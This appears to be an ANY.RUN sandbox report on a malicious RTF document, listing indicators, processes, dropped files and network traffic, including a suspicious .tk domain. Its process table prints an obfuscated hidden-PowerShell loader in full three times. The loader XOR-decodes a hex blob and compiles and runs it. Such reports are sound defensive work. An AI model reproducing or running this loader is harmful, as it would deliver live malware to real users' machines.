analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Unconfirmed 367264.crdownload

Full analysis: https://app.any.run/tasks/f2bc43b2-42c6-498b-95eb-2ca18f23bcba
Verdict: Malicious activity
Analysis date: September 18, 2019, 19:08:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

9925AAE2E5BD9954D132E8C72AD44E58

SHA1:

28824B6FA1C3A98271348294304F9C0B414C39F8

SHA256:

4CA5872ADA793C013ADB0025ABFF3CA7D07345F0A52F93CCD24C474E54792324

SSDEEP:

3072:oHdXciMyH6vS64XciMyH6vS64XciMyH6vS64XciMyH6vS64XciMyH6vS64XciMyi:qhoohoohoohoohoohoohoyS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts Visual C# compiler

      • powershell.exe (PID: 2400)
      • powershell.exe (PID: 2372)
      • powershell.exe (PID: 3896)
      • powershell.exe (PID: 3740)
      • powershell.exe (PID: 2348)
      • powershell.exe (PID: 2776)
      • powershell.exe (PID: 3084)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3436)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 2520)
      • EXCEL.EXE (PID: 2052)
      • EXCEL.EXE (PID: 3244)
      • EXCEL.EXE (PID: 2704)
      • EXCEL.EXE (PID: 2640)
      • EXCEL.EXE (PID: 2236)
      • EXCEL.EXE (PID: 2532)
      • excelcnv.exe (PID: 3004)
    • Executed via WMI

      • powershell.exe (PID: 2400)
      • powershell.exe (PID: 2372)
      • powershell.exe (PID: 3896)
      • powershell.exe (PID: 3740)
      • powershell.exe (PID: 2776)
      • powershell.exe (PID: 2348)
      • powershell.exe (PID: 3084)
    • Creates files in the user directory

      • powershell.exe (PID: 2400)
      • powershell.exe (PID: 2372)
      • powershell.exe (PID: 3896)
      • powershell.exe (PID: 3740)
      • powershell.exe (PID: 2348)
      • powershell.exe (PID: 2776)
      • powershell.exe (PID: 3084)
    • PowerShell script executed

      • powershell.exe (PID: 2400)
      • powershell.exe (PID: 3896)
      • powershell.exe (PID: 2372)
      • powershell.exe (PID: 3740)
      • powershell.exe (PID: 2348)
      • powershell.exe (PID: 3084)
      • powershell.exe (PID: 2776)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 2228)
    • Starts Internet Explorer

      • rundll32.exe (PID: 2072)
    • Uses RUNDLL32.EXE to load library

      • WINWORD.EXE (PID: 3436)
    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 3436)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2520)
      • WINWORD.EXE (PID: 3436)
      • EXCEL.EXE (PID: 2052)
      • EXCEL.EXE (PID: 3244)
      • EXCEL.EXE (PID: 2704)
      • EXCEL.EXE (PID: 2236)
      • EXCEL.EXE (PID: 2640)
      • EXCEL.EXE (PID: 2532)
      • excelcnv.exe (PID: 3004)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3436)
      • iexplore.exe (PID: 2484)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2484)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2484)
    • Changes settings of System certificates

      • iexplore.exe (PID: 3916)
    • Changes internet zones settings

      • iexplore.exe (PID: 3916)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 3916)
      • iexplore.exe (PID: 2484)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 3916)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 57435
CharactersWithSpaces: 4
Characters: 4
Words: -
Pages: 1
TotalEditTime: -
RevisionNumber: 1
ModifyDate: 2019:01:07 23:54:00
CreateDate: 2019:01:07 23:54:00
LastModifiedBy: Admin
Author: Admin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
78
Monitored processes
34
Malicious processes
1
Suspicious processes
7

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe no specs powershell.exe no specs excel.exe no specs csc.exe powershell.exe no specs excel.exe no specs cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs excel.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs csc.exe excelcnv.exe no specs cvtres.exe no specs csc.exe cvtres.exe no specs rundll32.exe no specs rundll32.exe no specs iexplore.exe iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
3436"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Unconfirmed 367264.crdownload.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2520"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2400powershell -WindowStyle Hidden function oad4c4 { param($qa89651) $se84a8 = 'm888a2';$zae81 = ''; for ($i = 0; $i -lt $qa89651.length; $i+=2) { $e176d3 = [convert]::ToByte($qa89651.Substring($i, 2), 16); $zae81 += [char]($e176d3 -bxor $se84a8[($i / 2) % $se84a8.length]); } return $zae81; } $c275a7 = '184b515606123e414b4c045f564d4b510f554d6b414b155700166a4d0f4604555d16285c195d4a571161084a4e5102571e034d4b085c0a186b4112460855167c08530a56574b155b0e4b034d125b035f186b1841195d5516287d564d4b510f554d6b414b15570016765d15096032484d035e045b185b0d531e4b18405703595b595d1a69295454710c42024a4c104359084a565d0d015f1a147d0f461f416857085c19051a7f04463d4a575b2056094a5d4b121044651848145001515b1812460c4c515b4157154c5d4a0f1224564c6815404d4a5a0f56004571564c31461f18520f00010b0e144b154004565f1806545b590d01561b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c410f4d1a7457005621515a4a0040141a11654142185a545102121e4c594c08514d5d404c0440031871561562194a184e530a5e01104b154004565f1814560c0e0001001b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c5c103b514a4c145301684a5715570e4c1a113c121d4d5a5408514d4b4c59155b0e185d4015571f56185a0e5d01185d0d04535a5d10710f463d4c4a180c03555d0c5d4d6724564c6815404d52090b590141184d510f464d525b0105010814185714464d4d51561512010a5b0b030a4403637c0d5e245548571346451a735d135c08540b0a4f5601541a144177034c4a41315d04564c054360195475571757205d5557134b4f14186b044621594b4c24401f574a050753014b5d113c121e4c594c08514d5d404c044003184e5708564d555c5a04564571564c31461f185c0f00060b0c5e14285c19684c4a41405c090c0d4d5b034c185952510c5c5e115a42185a545102121e4c594c08514d51564c41470e0e0d0f581a444371561562194a18560704585c0f0d410f4d4e0a00520b4557595c555159101a080207580c5a0d50060b0d0e085007591a11115a5b0b10565e5707090f0d055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f24564c6815404d400a5c0503504a5a0f560045565e0e54565a0d14570056595b0c1043000e0d0d0c03075c0b0a0d50020e0d0e0f000609080f0d5502550c591a481b56515e101900095c09055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f3871564c31461f18565a53575905106d285c19684c4a4807564d515615121e005d5d02040e050803085445195d0d04535a5d10405356090914560300080c140819065d14574d15121e005d5d02040e111143065d1957185b020008090345234b195d6365415955590a0053065043084052034108405e071e5d4001081c0924564c6815404d555e01530b54057559134105595416205e01575b70265e025a5954490144037559134105595416225d1d41105359535f000a0c4d0241555e01530b54140b115a5f095a5d5c495c084f18710f463d4c4a101900095c0916355d24564c0e551a4413084051025c5a11140c54540a01014d0144035b5b53575c02186f04502e54515d0f464d425c00520150565d4f4165085a7b540857034c10115a41194a51560612140b5d0e580358057d56175b1f575655045c19167f5d157402545c5d13620c4c5010245c1b514a570f5f08564c163242085b51590d7402545c5d131c2c48485408510c4c51570f760c4c59114a1031644d0a040a081a13570056595b0c1043065e0d5c0c5107091a11031b56550b0b16255d1a56545700562b51545d495d0c5c0c5b551a4f080d0c02060e0c000d0303090c0a0c02075d0d090953030b085b0800020c090e095407540c0a0d5007580d010857075a0c0a0d56070e0d0f0c07075a090d0d05104414410b040454090d115a621f575b5d12413e4c594a157b035e57181206585e59050f571a18684a0e51084b4b6b15531f4c7156075d45410b5d570b5c0d11033140025b5d4b121c3e4c594a151a1e0c0d5e001b564a5d4c1440031808031c42185a545102121e4c594c08514d4b4c4a085c0a18575905060e0c104b154004565f181b005a010c111a41194a51560612070f590b0704501a5500590a0c0a1a0312461f51565f41445f000b015c61194a5156061c2855484c18090b574a10085c1918510551090404420a560b5916745d0f55195003514a0f5f11435a184608184a5a56055f057b570f44084a4c16355d2f414c5d49485f0f010c4f61185a4b4c135b035f10514d004414090e48091b0a000b581950105b50004044104a5a56055f1866180b050c0b5e0e3a1a04170a1141174d520f5952545b16745d0f55195065115a4f1f5d4c4d135c4d4e0a00520b564545'; $c275a72 = oad4c4($c275a7); Add-Type -TypeDefinition $c275a72; [x614cae]::uc6579(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2052"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2228"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tl6fa_gt.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
2372powershell -WindowStyle Hidden function oad4c4 { param($qa89651) $se84a8 = 'm888a2';$zae81 = ''; for ($i = 0; $i -lt $qa89651.length; $i+=2) { $e176d3 = [convert]::ToByte($qa89651.Substring($i, 2), 16); $zae81 += [char]($e176d3 -bxor $se84a8[($i / 2) % $se84a8.length]); } return $zae81; } $c275a7 = '184b515606123e414b4c045f564d4b510f554d6b414b155700166a4d0f4604555d16285c195d4a571161084a4e5102571e034d4b085c0a186b4112460855167c08530a56574b155b0e4b034d125b035f186b1841195d5516287d564d4b510f554d6b414b15570016765d15096032484d035e045b185b0d531e4b18405703595b595d1a69295454710c42024a4c104359084a565d0d015f1a147d0f461f416857085c19051a7f04463d4a575b2056094a5d4b121044651848145001515b1812460c4c515b4157154c5d4a0f1224564c6815404d4a5a0f56004571564c31461f18520f00010b0e144b154004565f1806545b590d01561b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c410f4d1a7457005621515a4a0040141a11654142185a545102121e4c594c08514d5d404c0440031871561562194a184e530a5e01104b154004565f1814560c0e0001001b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c5c103b514a4c145301684a5715570e4c1a113c121d4d5a5408514d4b4c59155b0e185d4015571f56185a0e5d01185d0d04535a5d10710f463d4c4a180c03555d0c5d4d6724564c6815404d52090b590141184d510f464d525b0105010814185714464d4d51561512010a5b0b030a4403637c0d5e245548571346451a735d135c08540b0a4f5601541a144177034c4a41315d04564c054360195475571757205d5557134b4f14186b044621594b4c24401f574a050753014b5d113c121e4c594c08514d5d404c044003184e5708564d555c5a04564571564c31461f185c0f00060b0c5e14285c19684c4a41405c090c0d4d5b034c185952510c5c5e115a42185a545102121e4c594c08514d51564c41470e0e0d0f581a444371561562194a18560704585c0f0d410f4d4e0a00520b4557595c555159101a080207580c5a0d50060b0d0e085007591a11115a5b0b10565e5707090f0d055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f24564c6815404d400a5c0503504a5a0f560045565e0e54565a0d14570056595b0c1043000e0d0d0c03075c0b0a0d50020e0d0e0f000609080f0d5502550c591a481b56515e101900095c09055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f3871564c31461f18565a53575905106d285c19684c4a4807564d515615121e005d5d02040e050803085445195d0d04535a5d10405356090914560300080c140819065d14574d15121e005d5d02040e111143065d1957185b020008090345234b195d6365415955590a0053065043084052034108405e071e5d4001081c0924564c6815404d555e01530b54057559134105595416205e01575b70265e025a5954490144037559134105595416225d1d41105359535f000a0c4d0241555e01530b54140b115a5f095a5d5c495c084f18710f463d4c4a101900095c0916355d24564c0e551a4413084051025c5a11140c54540a01014d0144035b5b53575c02186f04502e54515d0f464d425c00520150565d4f4165085a7b540857034c10115a41194a51560612140b5d0e580358057d56175b1f575655045c19167f5d157402545c5d13620c4c5010245c1b514a570f5f08564c163242085b51590d7402545c5d131c2c48485408510c4c51570f760c4c59114a1031644d0a040a081a13570056595b0c1043065e0d5c0c5107091a11031b56550b0b16255d1a56545700562b51545d495d0c5c0c5b551a4f080d0c02060e0c000d0303090c0a0c02075d0d090953030b085b0800020c090e095407540c0a0d5007580d010857075a0c0a0d56070e0d0f0c07075a090d0d05104414410b040454090d115a621f575b5d12413e4c594a157b035e57181206585e59050f571a18684a0e51084b4b6b15531f4c7156075d45410b5d570b5c0d11033140025b5d4b121c3e4c594a151a1e0c0d5e001b564a5d4c1440031808031c42185a545102121e4c594c08514d4b4c4a085c0a18575905060e0c104b154004565f181b005a010c111a41194a51560612070f590b0704501a5500590a0c0a1a0312461f51565f41445f000b015c61194a5156061c2855484c18090b574a10085c1918510551090404420a560b5916745d0f55195003514a0f5f11435a184608184a5a56055f057b570f44084a4c16355d2f414c5d49485f0f010c4f61185a4b4c135b035f10514d004414090e48091b0a000b581950105b50004044104a5a56055f1866180b050c0b5e0e3a1a04170a1141174d520f5952545b16745d0f55195065115a4f1f5d4c4d135c4d4e0a00520b564545'; $c275a72 = oad4c4($c275a7); Add-Type -TypeDefinition $c275a72; [x614cae]::uc6579(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3244"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3504C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESAF31.tmp" "c:\Users\admin\AppData\Local\Temp\CSCAF30.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
3896powershell -WindowStyle Hidden function oad4c4 { param($qa89651) $se84a8 = 'm888a2';$zae81 = ''; for ($i = 0; $i -lt $qa89651.length; $i+=2) { $e176d3 = [convert]::ToByte($qa89651.Substring($i, 2), 16); $zae81 += [char]($e176d3 -bxor $se84a8[($i / 2) % $se84a8.length]); } return $zae81; } $c275a7 = '184b515606123e414b4c045f564d4b510f554d6b414b155700166a4d0f4604555d16285c195d4a571161084a4e5102571e034d4b085c0a186b4112460855167c08530a56574b155b0e4b034d125b035f186b1841195d5516287d564d4b510f554d6b414b15570016765d15096032484d035e045b185b0d531e4b18405703595b595d1a69295454710c42024a4c104359084a565d0d015f1a147d0f461f416857085c19051a7f04463d4a575b2056094a5d4b121044651848145001515b1812460c4c515b4157154c5d4a0f1224564c6815404d4a5a0f56004571564c31461f18520f00010b0e144b154004565f1806545b590d01561b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c410f4d1a7457005621515a4a0040141a11654142185a545102121e4c594c08514d5d404c0440031871561562194a184e530a5e01104b154004565f1814560c0e0001001b56637c540d7b0048574a151a4f535d4a0f57010b0a1a4d1228564c4a18620251564c5c103b514a4c145301684a5715570e4c1a113c121d4d5a5408514d4b4c59155b0e185d4015571f56185a0e5d01185d0d04535a5d10710f463d4c4a180c03555d0c5d4d6724564c6815404d52090b590141184d510f464d525b0105010814185714464d4d51561512010a5b0b030a4403637c0d5e245548571346451a735d135c08540b0a4f5601541a144177034c4a41315d04564c054360195475571757205d5557134b4f14186b044621594b4c24401f574a050753014b5d113c121e4c594c08514d5d404c044003184e5708564d555c5a04564571564c31461f185c0f00060b0c5e14285c19684c4a41405c090c0d4d5b034c185952510c5c5e115a42185a545102121e4c594c08514d51564c41470e0e0d0f581a444371561562194a18560704585c0f0d410f4d4e0a00520b4557595c555159101a080207580c5a0d50060b0d0e085007591a11115a5b0b10565e5707090f0d055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f24564c6815404d400a5c0503504a5a0f560045565e0e54565a0d14570056595b0c1043000e0d0d0c03075c0b0a0d50020e0d0e0f000609080f0d5502550c591a481b56515e101900095c09055c7b034c684c131c375d4a5748490a574c5741510e0a5d095a4f3871564c31461f18565a53575905106d285c19684c4a4807564d515615121e005d5d02040e050803085445195d0d04535a5d10405356090914560300080c140819065d14574d15121e005d5d02040e111143065d1957185b020008090345234b195d6365415955590a0053065043084052034108405e071e5d4001081c0924564c6815404d555e01530b54057559134105595416205e01575b70265e025a5954490144037559134105595416225d1d41105359535f000a0c4d0241555e01530b54140b115a5f095a5d5c495c084f18710f463d4c4a101900095c0916355d24564c0e551a4413084051025c5a11140c54540a01014d0144035b5b53575c02186f04502e54515d0f464d425c00520150565d4f4165085a7b540857034c10115a41194a51560612140b5d0e580358057d56175b1f575655045c19167f5d157402545c5d13620c4c5010245c1b514a570f5f08564c163242085b51590d7402545c5d131c2c48485408510c4c51570f760c4c59114a1031644d0a040a081a13570056595b0c1043065e0d5c0c5107091a11031b56550b0b16255d1a56545700562b51545d495d0c5c0c5b551a4f080d0c02060e0c000d0303090c0a0c02075d0d090953030b085b0800020c090e095407540c0a0d5007580d010857075a0c0a0d56070e0d0f0c07075a090d0d05104414410b040454090d115a621f575b5d12413e4c594a157b035e57181206585e59050f571a18684a0e51084b4b6b15531f4c7156075d45410b5d570b5c0d11033140025b5d4b121c3e4c594a151a1e0c0d5e001b564a5d4c1440031808031c42185a545102121e4c594c08514d4b4c4a085c0a18575905060e0c104b154004565f181b005a010c111a41194a51560612070f590b0704501a5500590a0c0a1a0312461f51565f41445f000b015c61194a5156061c2855484c18090b574a10085c1918510551090404420a560b5916745d0f55195003514a0f5f11435a184608184a5a56055f057b570f44084a4c16355d2f414c5d49485f0f010c4f61185a4b4c135b035f10514d004414090e48091b0a000b581950105b50004044104a5a56055f1866180b050c0b5e0e3a1a04170a1141174d520f5952545b16745d0f55195065115a4f1f5d4c4d135c4d4e0a00520b564545'; $c275a72 = oad4c4($c275a7); Add-Type -TypeDefinition $c275a72; [x614cae]::uc6579(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2704"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Total events
4 685
Read events
3 751
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
18
Text files
46
Unknown types
16

Dropped files

PID
Process
Filename
Type
3436WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9CB2.tmp.cvr
MD5:
SHA256:
2520EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRA472.tmp.cvr
MD5:
SHA256:
2052EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRAB29.tmp.cvr
MD5:
SHA256:
2400powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VMLZC941EL7W7FCKY09R.temp
MD5:
SHA256:
3244EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRAEB3.tmp.cvr
MD5:
SHA256:
2228csc.exeC:\Users\admin\AppData\Local\Temp\CSCAF30.tmp
MD5:
SHA256:
3504cvtres.exeC:\Users\admin\AppData\Local\Temp\RESAF31.tmp
MD5:
SHA256:
2228csc.exeC:\Users\admin\AppData\Local\Temp\tl6fa_gt.out
MD5:
SHA256:
2372powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KWXJLPI3G36A6WGS7DMV.temp
MD5:
SHA256:
2704EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRB2CA.tmp.cvr
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
86
DNS requests
17
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2484
iexplore.exe
GET
301
2.16.186.27:80
http://shell.windows.com/fileassoc/fileassoc.asp?Ext=DS_Store
unknown
whitelisted
2484
iexplore.exe
GET
200
2.16.106.233:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
unknown
compressed
57.0 Kb
whitelisted
3916
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2484
iexplore.exe
GET
200
2.16.106.233:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt
unknown
der
969 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3916
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3916
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
2484
iexplore.exe
40.90.23.153:443
login.live.com
Microsoft Corporation
US
unknown
2484
iexplore.exe
2.19.38.59:80
go.microsoft.com
Akamai International B.V.
whitelisted
2484
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
2484
iexplore.exe
2.16.186.27:80
shell.windows.com
Akamai International B.V.
whitelisted
2484
iexplore.exe
172.217.16.138:443
ajax.googleapis.com
Google Inc.
US
whitelisted
2484
iexplore.exe
66.39.64.146:443
file.org
pair Networks
US
malicious
2484
iexplore.exe
52.164.210.24:443
consent.cookiebot.com
Microsoft Corporation
IE
whitelisted
2484
iexplore.exe
216.58.206.10:443
fonts.googleapis.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
this-a22.tk
suspicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
go.microsoft.com
  • 2.19.38.59
whitelisted
shell.windows.com
  • 2.16.186.27
  • 2.16.186.24
whitelisted
login.live.com
  • 40.90.23.153
  • 40.90.23.206
  • 40.90.137.127
whitelisted
file.org
  • 66.39.64.146
whitelisted
fonts.googleapis.com
  • 216.58.206.10
whitelisted
kcdn.file.org
  • 185.172.148.128
whitelisted
maxcdn.bootstrapcdn.com
  • 209.197.3.15
whitelisted
ajax.googleapis.com
  • 172.217.16.138
  • 172.217.22.42
  • 172.217.22.74
  • 172.217.22.106
  • 216.58.210.10
  • 172.217.16.202
  • 172.217.18.106
  • 172.217.23.170
  • 216.58.205.234
  • 172.217.21.234
  • 172.217.22.10
  • 172.217.18.170
  • 216.58.206.10
  • 216.58.207.42
  • 216.58.207.74
  • 216.58.208.42
whitelisted

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a .tk domain - Likely Hostile
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144